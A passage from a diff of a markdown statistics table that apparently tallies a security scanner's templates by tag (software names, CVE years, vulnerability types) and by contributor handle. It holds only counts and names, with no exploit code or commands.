skeltavik | 3 | | | | | | | -| struts | 14 | z3bd | 3 | | | | | | | -| dlink | 14 | andydoering | 3 | | | | | | | -| hp | 13 | f1tz | 3 | | | | | | | -| api | 13 | impramodsargar | 3 | | | | | | | -| tomcat | 12 | davidmckennirey | 3 | | | | | | | -| cve2013 | 12 | unstabl3 | 3 | | | | | | | -| printer | 12 | shifacyclewala | 3 | | | | | | | -| java | 12 | binaryfigments | 3 | | | | | | | -| status | 12 | mavericknerd | 3 | | | | | | | -| netsweeper | 12 | r3naissance | 3 | | | | | | | -| camera | 12 | fyoorer | 3 | | | | | | | -| kubernetes | 12 | gitlab red team | 3 | | | | | | | -| magento | 11 | sushantkamble | 3 | | | | | | | -| ruijie | 10 | arcc | 3 | | | | | | | -| dell | 10 | dudez | 3 | | | | | | | -| grafana | 10 | jarijaas | 3 | | | | | | | -| fileupload | 10 | yash anand @yashanand155 | 3 | | | | | | | -| rails | 10 | _generic_human_ | 3 | | | | | | | -| netgear | 10 | whoever | 3 | | | | | | | -| nginx | 10 | johnjhacking | 3 | | | | | | | -| backup | 10 | emenalf | 3 | | | | | | | -| glpi | 10 | lark-lab | 3 | | | | | | | -| log4j | 9 | alifathi-h1 | 3 | | | | | | | -| cve2008 | 9 | me9187 | 3 | | | | | | | -| coldfusion | 9 | joeldeleep | 2 | | | | | | | -| ftp | 9 | bernardofsr | 2 | | | | | | | -| auth | 9 | gal nagli | 2 | | | | | | | -| airflow | 9 | convisoappsec | 2 | | | | | | | -| upload | 9 | supras | 2 | | | | | | | -| webserver | 9 | 0xsapra | 2 | | | | | | | -| windows | 9 | bp0lr | 2 | | | | | | | -| fortinet | 9 | redteambrasil | 2 | | | | | | | -| drupal | 9 | zomsop82 | 2 | | | | | | | -| fastjson | 9 | z0ne | 2 | | | | | | | -| mirai | 8 | 0xrudra | 2 | | | | | | | -| solr | 8 | 0xsmiley | 2 | | | | | | | -| scada | 8 | smaranchand | 2 | | | | | | | -| woocommerce | 8 | ehsahil | 2 | | | | | | | -| phpmyadmin | 8 | pxmme1337 | 2 | | | | | | | -| vcenter | 8 | 0xelkomy | 2 | | | | | | | -| confluence | 8 | r12w4n | 2 | | | | | | | -| citrix | 8 | ajaysenr | 2 | | | | | | | -| jndi | 8 | bing0o | 2 | | | | | | | -| prometheus | 8 | kiblyn11 | 2 | | | | | | | -| spring | 8 | sbani | 2 | | | | | | | -| django | 8 | huowuzhao | 2 | | | | | | | -| amazon | 8 | hetroublemakr | 2 | | | | | | | -| bypass | 8 | vavkamil | 2 | | | | | | | -| blind | 8 | nkxxkn | 2 | | | | | | | -| zabbix | 8 | afaq | 2 | | | | | | | -| metadata | 8 | lotusdll | 2 | | | | | | | -| sonicwall | 7 | swissky | 2 | | | | | | | -| graphql | 7 | bananabr | 2 | | | | | | | -| exchange | 7 | foulenzer | 2 | | | | | | | -| azure | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| jolokia | 7 | mr-xn | 2 | | | | | | | -| rconfig | 7 | cocxanh | 2 | | | | | | | -| laravel | 7 | manas_harsh | 2 | | | | | | | -| files | 7 | dheerajmadhukar | 2 | | | | | | | -| kafka | 7 | socketz | 2 | | | | | | | -| maps | 7 | moritz nentwig | 2 | | | | | | | -| mail | 7 | koti2 | 2 | | | | | | | -| elasticsearch | 7 | gevakun | 2 | | | | | | | -| cnvd2021 | 7 | hahwul | 2 | | | | | | | -| python | 7 | w4cky_ | 2 | | | | | | | -| squirrelmail | 7 | sy3omda | 2 | | | | | | | -| bucket | 7 | dahse89 | 2 | | | | | | | -| vpn | 6 | 0xprial | 2 | | | | | | | -| magmi | 6 | fabaff | 2 | | | | | | | -| lucee | 6 | kre80r | 2 | | | | | | | -| backdoor | 6 | paradessia | 2 | | | | | | | +| api | 13 | shine | 3 | | | | | | | +| hp | 13 | impramodsargar | 3 | | | | | | | +| camera | 12 | yash anand @yashanand155 | 3 | | | | | | | +| netsweeper | 12 | f1tz | 3 | | | | | | | +| java | 12 | mavericknerd | 3 | | | | | | | +| fileupload | 12 | z3bd | 3 | | | | | | | +| tomcat | 12 | andydoering | 3 | | | | | | | +| cve2013 | 12 | dudez | 3 | | | | | | | +| printer | 12 | alifathi-h1 | 3 | | | | | | | +| status | 12 | gitlab red team | 3 | | | | | | | +| kubernetes | 12 | binaryfigments | 3 | | | | | | | +| magento | 11 | edoardottt | 3 | | | | | | | +| dell | 10 | r3naissance | 3 | | | | | | | +| backup | 10 | 0w4ys | 3 | | | | | | | +| ruijie | 10 | unstabl3 | 3 | | | | | | | +| glpi | 10 | shifacyclewala | 3 | | | | | | | +| log4j | 10 | sushantkamble | 3 | | | | | | | +| netgear | 10 | emenalf | 3 | | | | | | | +| rails | 10 | jarijaas | 3 | | | | | | | +| nginx | 10 | davidmckennirey | 3 | | | | | | | +| grafana | 10 | me9187 | 3 | | | | | | | +| drupal | 9 | arcc | 3 | | | | | | | +| ftp | 9 | lark-lab | 3 | | | | | | | +| windows | 9 | pxmme1337 | 2 | | | | | | | +| coldfusion | 9 | fabaff | 2 | | | | | | | +| laravel | 9 | huowuzhao | 2 | | | | | | | +| webserver | 9 | manas_harsh | 2 | | | | | | | +| fastjson | 9 | udit_thakkur | 2 | | | | | | | +| upload | 9 | sy3omda | 2 | | | | | | | +| auth | 9 | hahwul | 2 | | | | | | | +| fortinet | 9 | ehsahil | 2 | | | | | | | +| cve2008 | 9 | paradessia | 2 | | | | | | | +| airflow | 9 | lotusdll | 2 | | | | | | | +| vcenter | 8 | 0xrudra | 2 | | | | | | | +| spring | 8 | hetroublemakr | 2 | | | | | | | +| metadata | 8 | parth | 2 | | | | | | | +| solr | 8 | y4er | 2 | | | | | | | +| blind | 8 | dahse89 | 2 | | | | | | | +| bypass | 8 | 0xsapra | 2 | | | | | | | +| mirai | 8 | bing0o | 2 | | | | | | | +| jndi | 8 | its0x08 | 2 | | | | | | | +| zabbix | 8 | ajaysenr | 2 | | | | | | | +| scada | 8 | kiblyn11 | 2 | | | | | | | +| phpmyadmin | 8 | nvn1729 | 2 | | | | | | | +| amazon | 8 | mohammedsaneem | 2 | | | | | | | +| woocommerce | 8 | k11h-de | 2 | | | | | | | +| confluence | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| django | 8 | bsysop | 2 | | | | | | | +| citrix | 8 | random-robbie | 2 | | | | | | | +| prometheus | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| jolokia | 7 | w4cky_ | 2 | | | | | | | +| cnvd2021 | 7 | sbani | 2 | | | | | | | +| bucket | 7 | ree4pwn | 2 | | | | | | | +| kafka | 7 | bananabr | 2 | | | | | | | +| python | 7 | convisoappsec | 2 | | | | | | | +| rconfig | 7 | g4l1t0 | 2 | | | | | | | +| sonicwall | 7 | smaranchand | 2 | | | | | | | +| maps | 7 | nkxxkn | 2 | | | | | | | +| azure | 7 | kre80r | 2 | | | | | | | +| elasticsearch | 7 | afaq | 2 | | | | | | | +| files | 7 | swissky | 2 | | | | | | | +| mail | 7 | x1m_martijn | 2 | | | | | | | +| exchange | 7 | paperpen | 2 | | | | | | | +| squirrelmail | 7 | gal nagli | 2 | | | | | | | +| graphql | 7 | foulenzer | 2 | | | | | | | +| zimbra | 6 | cocxanh | 2 | | | | | | | +| ofbiz | 6 | moritz nentwig | 2 | | | | | | | +| headless | 6 | hackerarpan | 2 | | | | | | | +| docker | 6 | randomrobbie | 2 | | | | | | | +| firmware | 6 | mr-xn | 2 | | | | | | | +| wso2 | 6 | joeldeleep | 2 | | | | | | | +| slack | 6 | 0xprial | 2 | | | | | | | +| magmi | 6 | amsda | 2 | | | | | | | +| go | 6 | gevakun | 2 | | | | | | | +| enum | 6 | koti2 | 2 | | | | | | | +| nodejs | 6 | vavkamil | 2 | | | | | | | +| vpn | 6 | bp0lr | 2 | | | | | | | +| backdoor | 6 | 0xelkomy | 2 | | | | | | | +| ssti | 6 | r12w4n | 2 | | | | | | | +| lucee | 6 | martincodes-de | 2 | | | | | | | +| lfr | 6 | zomsop82 | 2 | | | | | | | | cobbler | 6 | cckuakilong | 2 | | | | | | | -| docker | 6 | k11h-de | 2 | | | | | | | -| ofbiz | 6 | udit_thakkur | 2 | | | | | | | -| headless | 6 | nvn1729 | 2 | | | | | | | -| nodejs | 6 | x1m_martijn | 2 | | | | | | | -| wso2 | 6 | ree4pwn | 2 | | | | | | | -| firmware | 6 | vsh00t | 2 | | | | | | | -| sitecore | 6 | randomrobbie | 2 | | | | | | | -| slack | 6 | y4er | 2 | | | | | | | -| druid | 6 | martincodes-de | 2 | | | | | | | -| jetty | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| iis | 6 | bsysop | 2 | | | | | | | -| go | 6 | parth | 2 | | | | | | | -| enum | 6 | mohammedsaneem | 2 | | | | | | | -| jboss | 6 | its0x08 | 2 | | | | | | | -| ssti | 6 | amsda | 2 | | | | | | | -| crlf | 6 | g4l1t0 | 2 | | | | | | | -| github | 6 | 0xcrypto | 2 | | | | | | | -| zimbra | 6 | danielmofer | 2 | | | | | | | -| zhiyuan | 5 | random-robbie | 2 | | | | | | | -| firebase | 5 | kabirsuda | 1 | | | | | | | -| dedecms | 5 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| alibaba | 5 | aaron_costello | 1 | | | | | | | +| github | 6 | socketz | 2 | | | | | | | +| sitecore | 6 | z0ne | 2 | | | | | | | +| druid | 6 | vsh00t | 2 | | | | | | | +| crlf | 6 | bernardofsr | 2 | | | | | | | +| jboss | 6 | dheerajmadhukar | 2 | | | | | | | +| jetty | 6 | 0xcrypto | 2 | | | | | | | +| iis | 6 | supras | 2 | | | | | | | +| samsung | 5 | redteambrasil | 2 | | | | | | | +| node | 5 | 0xsmiley | 2 | | | | | | | +| dedecms | 5 | danielmofer | 2 | | | | | | | +| fatpipe | 5 | regala_ | 1 | | | | | | | +| storage | 5 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| error | 5 | 0xtavian | 1 | | | | | | | +| ssl | 5 | andirrahmani1 | 1 | | | | | | | +| circarlife | 5 | narluin | 1 | | | | | | | +| solarwinds | 5 | akshansh | 1 | | | | | | | +| moodle | 5 | daviey | 1 | | | | | | | +| strapi | 5 | exploitation | 1 | | | | | | | +| rseenet | 5 | zsusac | 1 | | | | | | | +| thinkphp | 5 | nytr0gen | 1 | | | | | | | +| minio | 5 | izn0u | 1 | | | | | | | +| alibaba | 5 | orpheus | 1 | | | | | | | +| apisix | 5 | h1ei1 | 1 | | | | | | | +| zhiyuan | 5 | d4vy | 1 | | | | | | | +| icewarp | 5 | official_blackhat13 | 1 | | | | | | | +| artica | 5 | x6263 | 1 | | | | | | | +| cnvd2020 | 5 | manuelbua | 1 | | | | | | | +| symantec | 5 | c3l3si4n | 1 | | | | | | | +| git | 5 | oscarintherocks | 1 | | | | | | | +| setup | 5 | igibanez | 1 | | | | | | | +| keycloak | 5 | undefl0w | 1 | | | | | | | +| symfony | 5 | hexcat | 1 | | | | | | | +| gocd | 5 | 0xrod | 1 | | | | | | | +| firebase | 5 | brabbit10 | 1 | | | | | | | +| rfi | 5 | miroslavsotak | 1 | | | | | | | +| ruby | 4 | kabirsuda | 1 | | | | | | | +| mongodb | 4 | elmahdi | 1 | | | | | | | +| wcs | 4 | elouhi | 1 | | | | | | | +| oss | 4 | philippdelteil | 1 | | | | | | | +| microstrategy | 4 | absshax | 1 | | | | | | | +| mailchimp | 4 | kiks7 | 1 | | | | | | | +| asp | 4 | ahmed abou-ela | 1 | | | | | | | +| puppet | 4 | knassar702 | 1 | | | | | | | +| cve2007 | 4 | streetofhackerr007 | 1 | | | | | | | +| flink | 4 | hakluke | 1 | | | | | | | +| plesk | 4 | udyz | 1 | | | | | | | +| jellyfin | 4 | ohlinge | 1 | | | | | | | +| hongdian | 4 | remonsec | 1 | | | | | | | +| photo | 4 | thezakman | 1 | | | | | | | +| gogs | 4 | bjhulst | 1 | | | | | | | +| caucho | 4 | petruknisme | 1 | | | | | | | +| ssh | 4 | brenocss | 1 | | | | | | | +| bigip | 4 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| error | 5 | 2rs3c | 1 | | | | | | | -| rseenet | 5 | juicypotato1 | 1 | | | | | | | -| ssl | 5 | tirtha_mandal | 1 | | | | | | | -| minio | 5 | flag007 | 1 | | | | | | | -| strapi | 5 | clarkvoss | 1 | | | | | | | -| solarwinds | 5 | zandros0 | 1 | | | | | | | -| thinkphp | 5 | rojanrijal | 1 | | | | | | | -| rfi | 5 | kishore krishna (sillydaddy) | 1 | | | | | | | -| setup | 5 | momen eldawakhly | 1 | | | | | | | -| keycloak | 5 | kurohost | 1 | | | | | | | -| apisix | 5 | furkansenan | 1 | | | | | | | -| fatpipe | 5 | ritikchaddha | 1 | | | | | | | -| cnvd2020 | 5 | pdp | 1 | | | | | | | -| circarlife | 5 | noobexploiter | 1 | | | | | | | -| symfony | 5 | apt-mirror | 1 | | | | | | | -| storage | 5 | _c0wb0y_ | 1 | | | | | | | -| samsung | 5 | luskabol | 1 | | | | | | | -| gocd | 5 | ahmed abou-ela | 1 | | | | | | | -| node | 5 | tea | 1 | | | | | | | -| symantec | 5 | omarkurt | 1 | | | | | | | -| git | 5 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| icewarp | 5 | thezakman | 1 | | | | | | | -| moodle | 5 | izn0u | 1 | | | | | | | -| panos | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| couchdb | 4 | jiheon-dev | 1 | | | | | | | +| fpd | 4 | deena | 1 | | | | | | | +| kibana | 4 | lethargynavigator | 1 | | | | | | | +| cache | 4 | kba@sogeti_esec | 1 | | | | | | | +| stripe | 4 | fmunozs | 1 | | | | | | | +| terramaster | 4 | patralos | 1 | | | | | | | +| artifactory | 4 | droberson | 1 | | | | | | | +| jetbrains | 4 | push4d | 1 | | | | | | | +| npm | 4 | affix | 1 | | | | | | | +| activemq | 4 | akash.c | 1 | | | | | | | +| xmlrpc | 4 | berkdusunur | 1 | | | | | | | +| cacti | 4 | nielsing | 1 | | | | | | | +| huawei | 4 | _darrenmartyn | 1 | | | | | | | +| microweber | 4 | becivells | 1 | | | | | | | +| buffalo | 4 | andysvints | 1 | | | | | | | +| smtp | 4 | nerrorsec | 1 | | | | | | | +| prestashop | 4 | aaronchen0 | 1 | | | | | | | +| cnvd2019 | 4 | ilovebinbash | 1 | | | | | | | +| sonarqube | 4 | kaizensecurity | 1 | | | | | | | +| awstats | 4 | evan rubinstien | 1 | | | | | | | +| nexus | 4 | pudsec | 1 | | | | | | | +| thinkcmf | 4 | un-fmunozs | 1 | | | | | | | +| opensis | 4 | osamahamad | 1 | | | | | | | +| hikvision | 4 | ritikchaddha | 1 | | | | | | | +| elastic | 4 | jeya.seelan | 1 | | | | | | | +| hpe | 4 | anon-artist | 1 | | | | | | | +| paypal | 4 | skylark-lab | 1 | | | | | | | +| search | 4 | majidmc2 | 1 | | | | | | | +| ognl | 4 | schniggie | 1 | | | | | | | +| websphere | 4 | ahmetpergamum | 1 | | | | | | | +| aspose | 4 | prettyboyaaditya | 1 | | | | | | | +| resin | 4 | dhiyaneshdki | 1 | | | | | | | +| cockpit | 4 | sicksec | 1 | | | | | | | +| leak | 4 | aresx | 1 | | | | | | | +| panos | 4 | fq_hsu | 1 | | | | | | | +| kevinlab | 4 | furkansayim | 1 | | | | | | | +| openssh | 3 | luqman | 1 | | | | | | | +| thinfinity | 3 | ringo | 1 | | | | | | | +| telerik | 3 | co0nan | 1 | | | | | | | +| bitrix | 3 | sec_hawk | 1 | | | | | | | +| sendgrid | 3 | jeya seelan | 1 | | | | | | | +| lansweeper | 3 | apt-mirror | 1 | | | | | | | +| openbmcs | 3 | ok_bye_now | 1 | | | | | | | +| ampps | 3 | coldfish | 1 | | | | | | | +| empirecms | 3 | xshuden | 1 | | | | | | | +| ebs | 3 | blckraven | 1 | | | | | | | +| kentico | 3 | lark lab | 1 | | | | | | | +| openam | 3 | momen eldawakhly | 1 | | | | | | | +| cloud | 3 | 0h1in9e | 1 | | | | | | | +| voip | 3 | exid | 1 | | | | | | | +| adminer | 3 | tirtha_mandal | 1 | | | | | | | +| zeroshell | 3 | 3th1c_yuk1 | 1 | | | | | | | +| messaging | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| samba | 3 | borna nematzadeh | 1 | | | | | | | +| vrealize | 3 | raesene | 1 | | | | | | | +| consul | 3 | noobexploiter | 1 | | | | | | | +| bruteforce | 3 | whynotke | 1 | | | | | | | +| subrion | 3 | tim_koopmans | 1 | | | | | | | +| javascript | 3 | iampritam | 1 | | | | | | | +| fortios | 3 | mah3sec_ | 1 | | | | | | | +| seagate | 3 | chron0x | 1 | | | | | | | +| netlify | 3 | ooooooo_q | 1 | | | | | | | +| linkedin | 3 | shelld3v | 1 | | | | | | | +| movable | 3 | harshinsecurity | 1 | | | | | | | +| ems | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| grav | 3 | xstp | 1 | | | | | | | +| smb | 3 | intx0x80 | 1 | | | | | | | +| mongo | 3 | kareemse1im | 1 | | | | | | | +| oa | 3 | d0rkerdevil | 1 | | | | | | | +| prtg | 3 | yashanand155 | 1 | | | | | | | +| graph | 3 | ratnadip gajbhiye | 1 | | | | | | | +| dreambox | 3 | bad5ect0r | 1 | | | | | | | +| horizon | 3 | rojanrijal | 1 | | | | | | | +| zyxel | 3 | qlkwej | 1 | | | | | | | +| jamf | 3 | geraldino2 | 1 | | | | | | | +| lotus | 3 | ggranjus | 1 | | | | | | | +| vbulletin | 3 | husain | 1 | | | | | | | +| seeyon | 3 | infosecsanyam | 1 | | | | | | | +| heroku | 3 | rodnt | 1 | | | | | | | +| pentaho | 3 | toufik-airane | 1 | | | | | | | +| centos | 3 | ldionmarcil | 1 | | | | | | | +| targa | 3 | revblock | 1 | | | | | | | +| selea | 3 | _harleo | 1 | | | | | | | +| voipmonitor | 3 | 52971 | 1 | | | | | | | +| epson | 3 | shifacyclewla | 1 | | | | | | | +| axis2 | 3 | shreyapohekar | 1 | | | | | | | +| httpd | 3 | alex | 1 | | | | | | | +| webadmin | 3 | mubassirpatel | 1 | | | | | | | +| oauth | 3 | manasmbellani | 1 | | | | | | | +| square | 3 | _c0wb0y_ | 1 | | | | | | | +| axis | 3 | wabafet | 1 | | | | | | | +| hoteldruid | 3 | luskabol | 1 | | | | | | | +| springcloud | 3 | furkansenan | 1 | | | | | | | +| actuator | 3 | ahmed sherif | 1 | | | | | | | +| synology | 3 | arr0way | 1 | | | | | | | +| jeesns | 3 | jrolf | 1 | | | | | | | +| geowebserver | 3 | 0xteles | 1 | | | | | | | +| hashicorp | 3 | compr00t | 1 | | | | | | | +| nuuo | 3 | zhenwarx | 1 | | | | | | | +| phppgadmin | 3 | dawid-czarnecki | 1 | | | | | | | +| log | 3 | ipanda | 1 | | | | | | | +| exposures | 3 | sickwell | 1 | | | | | | | +| circleci | 3 | ofjaaah | 1 | | | | | | | +| trendnet | 3 | jas37 | 1 | | | | | | | +| trixbox | 3 | flag007 | 1 | | | | | | | +| phpinfo | 3 | veshraj | 1 | | | | | | | +| linkerd | 3 | pdp | 1 | | | | | | | +| nacos | 3 | rotemreiss | 1 | | | | | | | +| dos | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| mongodb | 4 | 0xtavian | 1 | | | | | | | -| xmlrpc | 4 | gboddin | 1 | | | | | | | -| prestashop | 4 | remonsec | 1 | | | | | | | -| huawei | 4 | push4d | 1 | | | | | | | -| websphere | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| buffalo | 4 | ringo | 1 | | | | | | | -| mailchimp | 4 | mubassirpatel | 1 | | | | | | | -| cacti | 4 | mah3sec_ | 1 | | | | | | | -| artifactory | 4 | affix | 1 | | | | | | | -| wcs | 4 | th3.d1p4k | 1 | | | | | | | -| cache | 4 | x6263 | 1 | | | | | | | -| asp | 4 | 52971 | 1 | | | | | | | -| aspose | 4 | notsoevilweasel | 1 | | | | | | | -| activemq | 4 | manasmbellani | 1 | | | | | | | -| stripe | 4 | fq_hsu | 1 | | | | | | | -| cockpit | 4 | deena | 1 | | | | | | | -| fpd | 4 | jeya.seelan | 1 | | | | | | | -| microstrategy | 4 | jteles | 1 | | | | | | | -| couchdb | 4 | myztique | 1 | | | | | | | -| hikvision | 4 | schniggie | 1 | | | | | | | -| ssh | 4 | ooooooo_q | 1 | | | | | | | -| elastic | 4 | florianmaak | 1 | | | | | | | -| thinkcmf | 4 | mesaglio | 1 | | | | | | | -| kibana | 4 | 0xteles | 1 | | | | | | | -| kevinlab | 4 | jeya seelan | 1 | | | | | | | -| ruby | 4 | luci | 1 | | | | | | | -| cnvd2019 | 4 | jas37 | 1 | | | | | | | -| plesk | 4 | philippdelteil | 1 | | | | | | | -| caucho | 4 | brenocss | 1 | | | | | | | -| flink | 4 | udyz | 1 | | | | | | | -| microweber | 4 | aceseven (digisec360) | 1 | | | | | | | -| lfr | 4 | wabafet | 1 | | | | | | | -| sonarqube | 4 | droberson | 1 | | | | | | | -| search | 4 | jrolf | 1 | | | | | | | -| nexus | 4 | un-fmunozs | 1 | | | | | | | -| oss | 4 | zsusac | 1 | | | | | | | -| paypal | 4 | notnotnotveg | 1 | | | | | | | -| artica | 4 | kailashbohara | 1 | | | | | | | -| leak | 4 | thebinitghimire | 1 | | | | | | | -| cve2007 | 4 | sickwell | 1 | | | | | | | -| gogs | 4 | cookiehanhoan | 1 | | | | | | | -| ognl | 4 | furkansayim | 1 | | | | | | | -| awstats | 4 | hanlaomo | 1 | | | | | | | -| hpe | 4 | charanrayudu | 1 | | | | | | | -| bigip | 4 | exploitation | 1 | | | | | | | -| npm | 4 | rodnt | 1 | | | | | | | -| jetbrains | 4 | luqmaan hadia | 1 | | | | | | | -| photo | 4 | ok_bye_now | 1 | | | | | | | -| jellyfin | 4 | yashgoti | 1 | | | | | | | -| opensis | 4 | 0ut0fb4nd | 1 | | | | | | | -| resin | 4 | b0rn2r00t | 1 | | | | | | | -| smtp | 4 | lark lab | 1 | | | | | | | -| hongdian | 4 | borna nematzadeh | 1 | | | | | | | -| wordfence | 3 | j33n1k4 | 1 | | | | | | | -| nosqli | 3 | streetofhackerr007 | 1 | | | | | | | -| oauth | 3 | c3l3si4n | 1 | | | | | | | -| circleci | 3 | majidmc2 | 1 | | | | | | | -| terramaster | 3 | lethargynavigator | 1 | | | | | | | -| exposures | 3 | patralos | 1 | | | | | | | -| smb | 3 | 0xceba | 1 | | | | | | | -| cves | 3 | mass0ma | 1 | | | | | | | -| ampps | 3 | hexcat | 1 | | | | | | | -| grav | 3 | andirrahmani1 | 1 | | | | | | | -| odoo | 3 | jiheon-dev | 1 | | | | | | | -| springcloud | 3 | ggranjus | 1 | | | | | | | -| linksys | 3 | 0xh7ml | 1 | | | | | | | -| bitrix | 3 | alevsk | 1 | | | | | | | -| webadmin | 3 | kba@sogeti_esec | 1 | | | | | | | -| sendgrid | 3 | for3stco1d | 1 | | | | | | | -| square | 3 | b0yd | 1 | | | | | | | -| horizon | 3 | nielsing | 1 | | | | | | | -| linkerd | 3 | sicksec | 1 | | | | | | | -| ebs | 3 | pudsec | 1 | | | | | | | -| graph | 3 | xshuden | 1 | | | | | | | -| heroku | 3 | ipanda | 1 | | | | | | | -| thinfinity | 3 | nerrorsec | 1 | | | | | | | -| zyxel | 3 | regala_ | 1 | | | | | | | -| phppgadmin | 3 | yuansec | 1 | | | | | | | -| openbmcs | 3 | ilovebinbash | 1 | | | | | | | -| globalprotect | 3 | yavolo | 1 | | | | | | | -| selea | 3 | willd96 | 1 | | | | | | | -| netlify | 3 | dawid-czarnecki | 1 | | | | | | | -| trendnet | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| dos | 3 | tim_koopmans | 1 | | | | | | | -| lotus | 3 | b4uh0lz | 1 | | | | | | | -| targa | 3 | rotemreiss | 1 | | | | | | | -| messaging | 3 | taielab | 1 | | | | | | | -| openssh | 3 | thesubtlety | 1 | | | | | | | -| openam | 3 | jbaines-r7 | 1 | | | | | | | -| jamf | 3 | mhdsamx | 1 | | | | | | | -| oa | 3 | ahmed sherif | 1 | | | | | | | -| concrete | 3 | blckraven | 1 | | | | | | | -| axis | 3 | knassar702 | 1 | | | | | | | -| zeroshell | 3 | compr00t | 1 | | | | | | | -| fanruan | 3 | chron0x | 1 | | | | | | | -| hoteldruid | 3 | dhiyaneshdki | 1 | | | | | | | -| db | 3 | retr02332 | 1 | | | | | | | -| nuuo | 3 | ofjaaah | 1 | | | | | | | -| dreambox | 3 | fmunozs | 1 | | | | | | | -| centos | 3 | veshraj | 1 | | | | | | | -| actuator | 3 | bernardo rodrigues | 1 | | | | | | | +| postmessage | 3 | zandros0 | 1 | | | | | | | +| odoo | 3 | luqmaan hadia | 1 | | | | | | | +| sql | 3 | act1on3 | 1 | | | | | | | +| k8s | 3 | thevillagehacker | 1 | | | | | | | +| axigen | 3 | sshell | 1 | | | | | | | +| cves | 3 | 0ut0fb4nd | 1 | | | | | | | +| facebook | 3 | kurohost | 1 | | | | | | | +| concrete | 3 | yavolo | 1 | | | | | | | +| tikiwiki | 3 | thebinitghimire | 1 | | | | | | | +| wordfence | 3 | florianmaak | 1 | | | | | | | +| linksys | 3 | omarkurt | 1 | | | | | | | +| globalprotect | 3 | akincibor | 1 | | | | | | | +| dolibarr | 3 | retr0 | 1 | | | | | | | +| nosqli | 3 | notnotnotveg | 1 | | | | | | | +| db | 3 | tea | 1 | | | | | | | +| mcafee | 3 | 0xd0ff9 | 1 | | | | | | | +| fanruan | 3 | yashgoti | 1 | | | | | | | +| aviatrix | 2 | taielab | 1 | | | | | | | +| openvpn | 2 | rubina119 | 1 | | | | | | | +| liferay | 2 | myztique | 1 | | | | | | | +| sugarcrm | 2 | j33n1k4 | 1 | | | | | | | +| bitly | 2 | for3stco1d | 1 | | | | | | | +| gespage | 2 | notsoevilweasel | 1 | | | | | | | +| panabit | 2 | 0xceba | 1 | | | | | | | +| graphite | 2 | cookiehanhoan | 1 | | | | | | | +| glances | 2 | mesaglio | 1 | | | | | | | +| jeedom | 2 | jteles | 1 | | | | | | | +| sentry | 2 | elder tao | 1 | | | | | | | +| rancher | 2 | alevsk | 1 | | | | | | | +| viewpoint | 2 | jbaines-r7 | 1 | | | | | | | +| typo3 | 2 | alperenkesk | 1 | | | | | | | +| mida | 2 | bughuntersurya | 1 | | | | | | | +| casdoor | 2 | s1r1u5_ | 1 | | | | | | | +| flir | 2 | micha3lb3n | 1 | | | | | | | +| netscaler | 2 | 2rs3c | 1 | | | | | | | +| s3 | 2 | vzamanillo | 1 | | | | | | | +| natshell | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| wooyun | 2 | clarkvoss | 1 | | | | | | | +| akkadian | 2 | th3.d1p4k | 1 | | | | | | | +| zblogphp | 2 | mass0ma | 1 | | | | | | | +| owasp | 2 | b0yd | 1 | | | | | | | +| detect | 2 | luci | 1 | | | | | | | +| circontrol | 2 | gboddin | 1 | | | | | | | +| mailgun | 2 | yuansec | 1 | | | | | | | +| digitalocean | 2 | mhdsamx | 1 | | | | | | | +| rackn | 2 | aceseven (digisec360) | 1 | | | | | | | +| chyrp | 2 | b0rn2r00t | 1 | | | | | | | +| openstack | 2 | willd96 | 1 | | | | | | | +| rabbitmq | 2 | soyelmago | 1 | | | | | | | +| accela | 2 | makyotox | 1 | | | | | | | +| auerswald | 2 | zinminphy0 | 1 | | | | | | | +| workspaceone | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| bruteforce | 3 | alex | 1 | | | | | | | -| nacos | 3 | osamahamad | 1 | | | | | | | -| synology | 3 | aresx | 1 | | | | | | | -| javascript | 3 | zhenwarx | 1 | | | | | | | -| consul | 3 | shreyapohekar | 1 | | | | | | | -| log | 3 | elmahdi | 1 | | | | | | | -| mongo | 3 | ahmetpergamum | 1 | | | | | | | -| fortios | 3 | brabbit10 | 1 | | | | | | | -| samba | 3 | kareemse1im | 1 | | | | | | | -| jeesns | 3 | elouhi | 1 | | | | | | | -| hashicorp | 3 | akash.c | 1 | | | | | | | -| adminer | 3 | anon-artist | 1 | | | | | | | -| k8s | 3 | shelld3v | 1 | | | | | | | -| prtg | 3 | _darrenmartyn | 1 | | | | | | | -| voipmonitor | 3 | akshansh | 1 | | | | | | | -| tikiwiki | 3 | geraldino2 | 1 | | | | | | | -| mcafee | 3 | revblock | 1 | | | | | | | -| epson | 3 | co0nan | 1 | | | | | | | -| trixbox | 3 | ohlinge | 1 | | | | | | | -| ems | 3 | miroslavsotak | 1 | | | | | | | -| postmessage | 3 | toufik-airane | 1 | | | | | | | -| movable | 3 | 3th1c_yuk1 | 1 | | | | | | | -| empirecms | 3 | yashanand155 | 1 | | | | | | | -| sql | 3 | noamrathaus | 1 | | | | | | | -| cloud | 3 | h1ei1 | 1 | | | | | | | -| dolibarr | 3 | shifacyclewla | 1 | | | | | | | -| axis2 | 3 | pratik khalane | 1 | | | | | | | -| phpinfo | 3 | 0xrod | 1 | | | | | | | -| facebook | 3 | alperenkesk | 1 | | | | | | | -| axigen | 3 | andysvints | 1 | | | | | | | -| vbulletin | 3 | oscarintherocks | 1 | | | | | | | -| geowebserver | 3 | sshell | 1 | | | | | | | -| subrion | 3 | thevillagehacker | 1 | | | | | | | -| voip | 3 | ldionmarcil | 1 | | | | | | | -| seeyon | 3 | micha3lb3n | 1 | | | | | | | -| pentaho | 3 | absshax | 1 | | | | | | | -| httpd | 3 | ratnadip gajbhiye | 1 | | | | | | | -| lansweeper | 3 | twitter.com/dheerajmadhukar 